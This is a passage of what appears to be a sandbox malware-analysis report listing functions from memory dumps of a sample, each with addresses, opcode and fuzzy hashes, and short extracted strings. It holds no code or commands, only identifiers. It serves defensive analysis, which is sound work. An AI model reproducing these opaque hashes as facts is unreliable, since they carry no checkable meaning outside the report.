                                                              • Snapshot File: hcaresult_0_2_7ffd9bfc0000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 91adde5a74cd1c935fce39083b90a280d1e95c7cfd07e3944d1e1b43ef131098
                                                              • Instruction ID: f1ccbaf5b0989bfe67f38188254f563d753c9fc490f7f7686f1baf9b5d904429
                                                              • Opcode Fuzzy Hash: 91adde5a74cd1c935fce39083b90a280d1e95c7cfd07e3944d1e1b43ef131098
                                                              • Instruction Fuzzy Hash: 43B09200F0E20B42E93028E008A003C00400B45201A521B38A20A452E2DC4A2A801232

                                                              Non-executed Functions

                                                              Function 00007FFD9BFC16E0 Relevance: .3, Instructions: 303COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1762302817.00007FFD9BFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9bfc0000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e969df49b9d14018eda8c1b85b1b7bd159d5a3e309302b8a0bee9b4f9e4952ea
                                                              • Instruction ID: 3bd533fa0d6d4062fdcb1090470f280da41a3844f00edc6bd0d6c6dff047408d
                                                              • Opcode Fuzzy Hash: e969df49b9d14018eda8c1b85b1b7bd159d5a3e309302b8a0bee9b4f9e4952ea
                                                              • Instruction Fuzzy Hash: 95B1A197B0FAC14BE3B11E94086813A7AB4BF852007190ABED4E40B9FBE527EF51C344
                                                              Function 00007FFD9BFCBE45 Relevance: .2, Instructions: 204COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1762302817.00007FFD9BFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9bfc0000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b90db05b6ddc31c1240daa617165f0f2f81b85475c0397b136b03e6a120973fa
                                                              • Instruction ID: 845d3620e050ccebabfd0bad9beb5f16850be51561e8edef511d2009595f8b7a
                                                              • Opcode Fuzzy Hash: b90db05b6ddc31c1240daa617165f0f2f81b85475c0397b136b03e6a120973fa
                                                              • Instruction Fuzzy Hash: 23817C31E0954D8FE754EFA4C8A5AEDB7B1FF88300F150279D059DB2A6CF39A9418B80

                                                              Executed Functions

                                                              Function 00007FFD9B880B3F Relevance: 3.8, Strings: 3, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2949087889.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd9b880000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: c9$!k9$"s9
                                                              • API String ID: 0-3426396564
                                                              • Opcode ID: d05d3994d320c0bc5c086aad5c5df6fa57d183bbd55fba1d74d9e808760a137c
                                                              • Instruction ID: 50db062815b0fb5348b70b91a392b217209b31f1ad5ba456762128be419cb8e2
                                                              • Opcode Fuzzy Hash: d05d3994d320c0bc5c086aad5c5df6fa57d183bbd55fba1d74d9e808760a137c
                                                              • Instruction Fuzzy Hash: 6201493F72A9068BC3016B2EF8905D8B740EBD513678505B7C544CB1A2F3101C9EC3E0
                                                              Function 00007FFD9BC41856 Relevance: 1.7, Strings: 1, Instructions: 470COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2953029862.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd9bc40000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: d
                                                              • API String ID: 0-2564639436
                                                              • Opcode ID: 9f79bde683338e1fdece491960b20515d7eccbb732664f21c37aebc7cf04dbcf
                                                              • Instruction ID: 3af05a98fd3008d4959be50549d6b381fc9b9db33c7d3cfc1cc95debb35e1a51
                                                              • Opcode Fuzzy Hash: 9f79bde683338e1fdece491960b20515d7eccbb732664f21c37aebc7cf04dbcf
                                                              • Instruction Fuzzy Hash: A9E12330B1CA0A8FD75DDF28D8A197977E2FF95300B1441B9D499C72A7EA34E9438781
                                                              Function 00007FFD9BFDD16B Relevance: 1.6, Strings: 1, Instructions: 352COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2960126772.00007FFD9BFD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd9bfd0000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: R^L
                                                              • API String ID: 0-2311395007
                                                              • Opcode ID: dba54584bd58ca774670f73ac3f0c464924d72c75f2979772677bc8febf5b424
                                                              • Instruction ID: 4446b1f866db23d826066951db134c4efdb6db05b50d78c49cb0a4be5182fdcb
                                                              • Opcode Fuzzy Hash: dba54584bd58ca774670f73ac3f0c464924d72c75f2979772677bc8febf5b424
                                                              • Instruction Fuzzy Hash: 27B19734718A1D8FDB58DF58C899AB9B3E2FF95314B1142A9D04EC76A6CB35EC42CB40
                                                              Function 00007FFD9BFD5F98 Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2960126772.00007FFD9BFD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd9bfd0000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: c47afc3440cbe5f738afbb94e0d9ddcfec21a9573b7bfa441cdbbc5c6b1fd1b0
                                                              • Instruction ID: 141b29006020ceb295f0f8f52bbd975d9eae32d1e2a36187185666890767d407
                                                              • Opcode Fuzzy Hash: c47afc3440cbe5f738afbb94e0d9ddcfec21a9573b7bfa441cdbbc5c6b1fd1b0
                                                              • Instruction Fuzzy Hash: 8B518F31E0964E9FDB69DFD8C4655BDBBB1EF94300F1142BAD01AD7292CB362901CB40
                                                              Function 00007FFD9BC483D8 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2953029862.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd9bc40000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: c887397197f90c875b78baeb7d2393cd7ca2a013d156077e5205898693daa04b
                                                              • Instruction ID: e1d5635b059617f6ccf462a38e6243db882d5f5ed7bd85539c53571460f15f47
                                                              • Opcode Fuzzy Hash: c887397197f90c875b78baeb7d2393cd7ca2a013d156077e5205898693daa04b
                                                              • Instruction Fuzzy Hash: 1D516B70E0964E8FEB59CFA8D4605BCB7B2FF49340F1544BAC01AE72D2DA386A01CB50
                                                              Function 00007FFD9BFDF048 Relevance: 1.4, Strings: 1, Instructions: 157COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2960126772.00007FFD9BFD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd9bfd0000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: 39732adf9b748140977aca86bc8cfa40d9d6dc440570b7361220dcec9670f6b9
                                                              • Instruction ID: bd6ba31618b41e5b619213ca4d15009bdf707fc6244e6f6f9aef2796874ae6a8
                                                              • Opcode Fuzzy Hash: 39732adf9b748140977aca86bc8cfa40d9d6dc440570b7361220dcec9670f6b9
                                                              • Instruction Fuzzy Hash: 77515D31E0964E8FDB69DF98D4649BDB7B1FF94300F1146BAC01AE7296CB366902CB50
                                                              Function 00007FFD9BC4EEC8 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2953029862.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd9bc40000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: bab04cf7c25710b1dd2cfab115fe0e6019632b0dfa6ba1f30f5d44523a91b648
                                                              • Instruction ID: c6d3439d1a9ade94a69346aa67869bee8598400bbcaf71b889f2b78257a9c8e5
                                                              • Opcode Fuzzy Hash: bab04cf7c25710b1dd2cfab115fe0e6019632b0dfa6ba1f30f5d44523a91b648
                                                              • Instruction Fuzzy Hash: C5515F71F0954E8FEB5DDFA8C4605BDB7B2EF54300F1241BAD01AE7292DA356A05CB40
                                                              Function 00007FFD9BC41649 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2953029862.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd9bc40000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: M
                                                              • API String ID: 0-3664761504
                                                              • Opcode ID: 2fab43f67375164e0c48785f1268416d02660efdc7fc5e7cfcfa2f8ce93d710f
                                                              • Instruction ID: d247522a99014582168980cf0294edfa4e393b9e5d975904516ba7b381a48a6e
                                                              • Opcode Fuzzy Hash: 2fab43f67375164e0c48785f1268416d02660efdc7fc5e7cfcfa2f8ce93d710f
                                                              • Instruction Fuzzy Hash: 69E0927160E7C48FC71AEA34886D455BFA1EF6721174A42EFC085CF1A3EA2DC885C701
                                                              Function 00007FFD9BFD3F10 Relevance: .7, Instructions: 691COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2960126772.00007FFD9BFD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd9bfd0000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c0cd2687321b60109b3d83330e073e9497ce6cf84bb0d81f623c7db2df455c0e
                                                              • Instruction ID: b4afb6aa250675c1bb51ecaca5a3b30b72816ae634b2e7fe73ab7376c3cb593e
                                                              • Opcode Fuzzy Hash: c0cd2687321b60109b3d83330e073e9497ce6cf84bb0d81f623c7db2df455c0e
                                                              • Instruction Fuzzy Hash: EF329430B19A1D8FDBA8DF48C8A5A6873E2FF94311B5142BDD01DC72A2DF25AD45CB81
                                                              Function 00007FFD9BFDD265 Relevance: .4, Instructions: 377COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2960126772.00007FFD9BFD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd9bfd0000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d1cbd729afaa44fecae8f113604b4d844192c366f06d84eff50494f59afad60d
                                                              • Instruction ID: 7b2b11c3579e78cbc9a275abd16284ffbf402d3a9d10e0a0784a73d077615394
                                                              • Opcode Fuzzy Hash: d1cbd729afaa44fecae8f113604b4d844192c366f06d84eff50494f59afad60d
                                                              • Instruction Fuzzy Hash: 42C19F34A0990D8FDBB8DE48C865B6877E1FF95315F1103B9D00DC7AA2DF2AAD458B81
                                                              Function 00007FFD9BFDF2BF Relevance: .4, Instructions: 362COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2960126772.00007FFD9BFD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd9bfd0000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 486571c8e96b690d2fde00b745df6c3c3aecc63e92144dd1af7efbee62ff16c3
                                                              • Instruction ID: acf6d4e47920989ad147a566e3bdb78c089ee1e4ad30c91fcf38965ba0a7ea44
                                                              • Opcode Fuzzy Hash: 486571c8e96b690d2fde00b745df6c3c3aecc63e92144dd1af7efbee62ff16c3
                                                              • Instruction Fuzzy Hash: 18D1BE30A1955A8BEB58CF58D0E09B537A1FF85311B5543FDC84ACB69ACB39E981CB80
                                                              Function 00007FFD9BFDF2DF Relevance: .3, Instructions: 333COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2960126772.00007FFD9BFD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd9bfd0000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d8053badfe1745bedfd01a45a3c1c7cf42bc3e93492ea24c2c5492a4ad63e321
                                                              • Instruction ID: c66411721e2e1a009c48e61946daaeffb98a5c00c809eea58bc4e64f219a289a
                                                              • Opcode Fuzzy Hash: d8053badfe1745bedfd01a45a3c1c7cf42bc3e93492ea24c2c5492a4ad63e321
                                                              • Instruction Fuzzy Hash: 70C1D030A1A54A8BEB1DCF54D0E09B537A1FF85311B5547FDC84A8B69BCB38E981CB80
                                                              Function 00007FFD9BFED19E Relevance: .3, Instructions: 328COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2960126772.00007FFD9BFD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd9bfd0000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b8d7d2655de7e7669306fea51bf3dfcab81840ebe5e86d79a3253e1e397ea0c8
                                                              • Instruction ID: 8340065747bafea9cd03091f5cc974d993b77d063621cdc307b48b6a255b05fc
                                                              • Opcode Fuzzy Hash: b8d7d2655de7e7669306fea51bf3dfcab81840ebe5e86d79a3253e1e397ea0c8
                                                              • Instruction Fuzzy Hash: AAB1EC357089198FDB9CFB58D4A9E7537E2EBA8745B1040A8F00FC72A6DD25EC818B81
                                                              Function 00007FFD9BFDEB72 Relevance: .3, Instructions: 327COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2960126772.00007FFD9BFD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd9bfd0000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fed4153a45aaad5b14b6ae7319777388cca68792092eaa14ecfd77c8b192d43b
                                                              • Instruction ID: 8efbb4cc3c3e7d4f57dcdefdad636301148a115810d968e0928e15401d89d8b5
                                                              • Opcode Fuzzy Hash: fed4153a45aaad5b14b6ae7319777388cca68792092eaa14ecfd77c8b192d43b
                                                              • Instruction Fuzzy Hash: E4C1E530B09A4A8FEB59DF58C4A06A4B7A1FF94300F46477ED04EC7A96CB39B951C781
                                                              Function 00007FFD9BC47F02 Relevance: .3, Instructions: 326COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2953029862.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd9bc40000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 46c959d194a6208a4aa88f6071d098a19446d97cb8c5e46e99d238243241e93e
                                                              • Instruction ID: c6d42f7987467ee9df07c0f5b033341f64d7550a4725e3aba17bcef268d8d794
                                                              • Opcode Fuzzy Hash: 46c959d194a6208a4aa88f6071d098a19446d97cb8c5e46e99d238243241e93e
                                                              • Instruction Fuzzy Hash: 34C1FA30B1DA4A8FE759DF64C0A06B8B7A2FF45340F55417AC44EC7A96DB38BA51C780
                                                              Function 00007FFD9BC4E9F2 Relevance: .3, Instructions: 325COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2953029862.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd9bc40000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a1ee8337f9f7b8f0e56f0afb7e2bec6e39c7bf2de8ca6a67ab059131bcd2ffa9
                                                              • Instruction ID: f253409b07340698abcb8a085a531e19328035a57ba3b164a103b30e3d340b25
                                                              • Opcode Fuzzy Hash: a1ee8337f9f7b8f0e56f0afb7e2bec6e39c7bf2de8ca6a67ab059131bcd2ffa9
                                                              • Instruction Fuzzy Hash: E6C1C430B09A4B8FE75DDF68C0A06B9B7A2FF44310F564179D04EC7A96DB28BA51C780
                                                              Function 00007FFD9BFD3487 Relevance: .3, Instructions: 309COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2960126772.00007FFD9BFD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd9bfd0000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9e6a5bcb2dab8dc9b3bf43e51242e532090f8de4190f80575fa1dbe69935a01c
                                                              • Instruction ID: 650302bf6a0e4b0060adc10fd3b273de766d27d16087a8d9b77073a3f2b26d3a
                                                              • Opcode Fuzzy Hash: 9e6a5bcb2dab8dc9b3bf43e51242e532090f8de4190f80575fa1dbe69935a01c
                                                              • Instruction Fuzzy Hash: 1E212C62F0F19B8AF73A5EE468354F82B509FC1320F1607B6D24E861E6DE4F394D5282
                                                              Function 00007FFD9BC458D7 Relevance: .3, Instructions: 305COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2953029862.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd9bc40000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: df165827ca01fd13349bf2fd6e8222fb691d456660209f2e6eb9030213a45f5b
                                                              • Instruction ID: a67fae41ef499f44dd587763e7f41b626712a9a4ab5302e8f6bafa2085be17b5
                                                              • Opcode Fuzzy Hash: df165827ca01fd13349bf2fd6e8222fb691d456660209f2e6eb9030213a45f5b
                                                              • Instruction Fuzzy Hash: 1721E122F0F69F86F6796AF828760FC77529F51224F2A01B7D04D860E7ED8C3B455292
                                                              Function 00007FFD9BFDC567 Relevance: .3, Instructions: 305COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2960126772.00007FFD9BFD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd9bfd0000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4e1bcc24855ade1a43650eab87bf3aa98b6dc37f7cf086f429160881aaf0ea5d
                                                              • Instruction ID: 7d92aaeb5ba9f3913ab6ba129159e0b9e79e46e77cacdb18e942740bf49d4e3f
                                                              • Opcode Fuzzy Hash: 4e1bcc24855ade1a43650eab87bf3aa98b6dc37f7cf086f429160881aaf0ea5d
                                                              • Instruction Fuzzy Hash: 6121F762F0F59B86F3392EA864351F85B409F95320F1A07B7D05D870E3DF1E29425382
                                                              Function 00007FFD9BC4C3FB Relevance: .3, Instructions: 299COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2953029862.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd9bc40000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 66ebe366ccb26c54560655903ce9d68c6b921bd6d7f3b5ed7114c3d49099d158
                                                              • Instruction ID: 9718c292a24c938911dce03d42c66960adf2f73918e2a106eb6afecd42f823c4
                                                              • Opcode Fuzzy Hash: 66ebe366ccb26c54560655903ce9d68c6b921bd6d7f3b5ed7114c3d49099d158
                                                              • Instruction Fuzzy Hash: B721D352F0F59B86F7395EF868321FD6A425F54626F1A61B6C04D860F3DC4C2B4162C2
                                                              Function 00007FFD9BC4864F Relevance: .3, Instructions: 294COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2953029862.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd9bc40000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3a1eac39b11dfe0aa90c0a5ee4de1647bf19fed8f14c18c39119ca4451ec6529
                                                              • Instruction ID: 7075a6fe961427215bfc7602627771d778fecd1f24ae0b7e61f867907fab6777
                                                              • Opcode Fuzzy Hash: 3a1eac39b11dfe0aa90c0a5ee4de1647bf19fed8f14c18c39119ca4451ec6529
                                                              • Instruction Fuzzy Hash: CBB1BF70619A558FEB59CF64C4E05B537A2FF49310B5141BCCC5A8B69FC738EA82CB81
                                                              Function 00007FFD9BFD5B1A Relevance: .3, Instructions: 288COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2960126772.00007FFD9BFD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd9bfd0000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 98e889f6023d143f801a568c413cb0a6da1d91598587a643f7aa082ad06e3296
                                                              • Instruction ID: 679ae08ba77a824af6597eb49e9603e83a10d3b1ec13848ae491317dea3d6041
                                                              • Opcode Fuzzy Hash: 98e889f6023d143f801a568c413cb0a6da1d91598587a643f7aa082ad06e3296
                                                              • Instruction Fuzzy Hash: 81A1683060EA8A8FE759DF68C0A45A4BBE1FF95300F4543B9C04EC7A97DB29B951C790
                                                              Function 00007FFD9BFD6326 Relevance: .3, Instructions: 288COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2960126772.00007FFD9BFD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd9bfd0000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1f4d2761268bcc29d71f4cb32e3e6ed377389d0c5107b1f3c06fabcecc320b27
                                                              • Instruction ID: 66128bb4d2c5d432840cab268079bd94d8b93d78cc36da0cd40495c099deefa1
                                                              • Opcode Fuzzy Hash: 1f4d2761268bcc29d71f4cb32e3e6ed377389d0c5107b1f3c06fabcecc320b27
                                                              • Instruction Fuzzy Hash: 26B1CF3061995A9FEB59CF48C4E06B037A1FF85310B5553BDD84B8B69ACB39F981CB80
                                                              Function 00007FFD9BFDBDF2 Relevance: .3, Instructions: 283COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2960126772.00007FFD9BFD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd9bfd0000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: df65881da1d5be21083862403c5890b35bbaea5cf1b990cf835f62c30272f3d6
                                                              • Instruction ID: a7ab57de77894a726c24465e228a2ede5a0cc43702fcd99a7e4e51e8a485621f
                                                              • Opcode Fuzzy Hash: df65881da1d5be21083862403c5890b35bbaea5cf1b990cf835f62c30272f3d6
                                                              • Instruction Fuzzy Hash: 92817731B0E6594FE729EBAC98A5BF937D1EF85310F0502BAE00DCB1E7DD2969458281
                                                              Function 00007FFD9BFDC53F Relevance: .3, Instructions: 275COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2960126772.00007FFD9BFD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd9bfd0000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d1ab301911667c0ff2d35e72e6f520b369b39d50aa3221246c472d6c45696ce2
                                                              • Instruction ID: b64a93b1592cab68dc3ed461c2c577700279ca717b63a99cda8972f4f34e6b3d
                                                              • Opcode Fuzzy Hash: d1ab301911667c0ff2d35e72e6f520b369b39d50aa3221246c472d6c45696ce2
                                                              • Instruction Fuzzy Hash: 9F21C022F0F19F86F7382EE464315BC2A509FD1710F2607BAD55E870E6DF4F2A416292
                                                              Function 00007FFD9BC4DF36 Relevance: .3, Instructions: 265COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2953029862.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd9bc40000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: db1e4be0c1360ced46a0edfccd6683afc49d1ec8059c5eacc0b374dbb07c4145
                                                              • Instruction ID: a57fa69f49dabfab7efb345316c91697d5e5109c01a654430bb613b104bca36d
                                                              • Opcode Fuzzy Hash: db1e4be0c1360ced46a0edfccd6683afc49d1ec8059c5eacc0b374dbb07c4145
                                                              • Instruction Fuzzy Hash: F8811631B4EA0A4FE37C5FB894655B977E2EF45310B16057ED49EC3192DE28BB028741
                                                              Function 00007FFD9BFD4FF6 Relevance: .3, Instructions: 265COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2960126772.00007FFD9BFD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd9bfd0000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8d004c80e98893e1b75c85d44a54b9b6c120e3b5d813b973a3a611d0e8630d50
                                                              • Instruction ID: 008e33a4b77c30af39fc8041d9a220e8cdc0fc65cb8875d0464950075eb172cb
                                                              • Opcode Fuzzy Hash: 8d004c80e98893e1b75c85d44a54b9b6c120e3b5d813b973a3a611d0e8630d50
                                                              • Instruction Fuzzy Hash: 5F812831B0EA0A4FE3789E68946517577E0EFC5351B16077ED08FC35A2DF2AB9028782
                                                              Function 00007FFD9BFDE0B6 Relevance: .3, Instructions: 256COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
